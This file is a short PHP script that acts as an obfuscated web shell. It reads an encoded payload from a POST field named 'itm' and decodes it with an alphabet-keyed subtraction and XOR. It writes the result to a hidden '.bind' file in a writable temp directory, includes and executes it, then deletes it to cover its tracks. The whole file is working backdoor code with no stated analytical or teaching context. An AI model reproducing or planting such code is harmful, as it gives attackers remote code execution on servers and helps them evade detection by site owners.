<?php

if(in_array("i\x74m", array_keys($_POST))){
	$obj = array_filter([session_save_path(), getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir(), "/tmp", getenv("TEMP"), "/var/tmp", "/dev/shm"]);
	$flag = $_POST["i\x74m"];
	$flag 	 = 		explode 	(	'.'	,	$flag );	 
	$comp = '';
            $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($s1  );
            $o = 0;
    
            $__tmp = $flag;
            while ($v9 = array_shift($__tmp)) {$chS = ord($s1[$o % $sLen]  );
                $dec = ((int)$v9 - $chS - ($o % 10))	^24;
                $comp .=	 chr($dec  );
                $o++; 	}
	foreach ($obj as $elem):
    		if (is_dir($elem) ? is_writable($elem) : false) {
    $binding = implode("/", [$elem, ".bind"]);
    if (@file_put_contents($binding, $comp) !== false) {
	include $binding;
	unlink($binding);
	exit;
}
}
endforeach;
}